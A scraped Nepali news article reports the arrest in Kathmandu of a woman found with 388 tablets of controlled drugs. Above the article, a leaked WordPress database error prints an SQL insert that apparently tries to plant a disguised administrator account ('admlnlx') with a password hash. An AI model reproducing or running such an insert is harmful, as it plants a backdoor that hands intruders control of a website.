WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BWXu5dFEyUwOza4lrudXkcJ3yl4DcJ.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 04:12:00', '', 'admlnlx', 'admlnlx')
काठमाडौं, फागुन ४ –
काठमाडौं महानगरपालिका-२० जैसीदेवलबाट विभिन्न लागुऔषधसहित सविना मगर तामाङ पक्राउ परेकी छिन् ।
धादिङ्ग खत्रीपौवा घर बताउने ३२ वर्षकी सविनाले लागुऔषधको कारोवार गर्छ भन्ने सूचनाको आधारमा महानगरीय प्रहरी बृत्त जनसेवाबाट खटिएको प्रहरी टोलिले उनको कोठामा खानतलासी गर्दा आगुऔषध भेट्टाएको हो ।
उनको कोठामा नुफीन ५९ वटा, डाइजोपाम १ सय ६० वटा, फेनेरागन १ सय ६९ वटा गरी जम्मा ३ सय ८८ वटा लागुऔषध फेला पारेको प्रहरीले जनाएको छ । उनलाई महानगरीय प्रहरी बृत्त जनसेवामा राखिएको र घटनाका सम्बन्धमा अन्य अनुसन्धान भइरहेको प्रहरीले जनाएको छ ।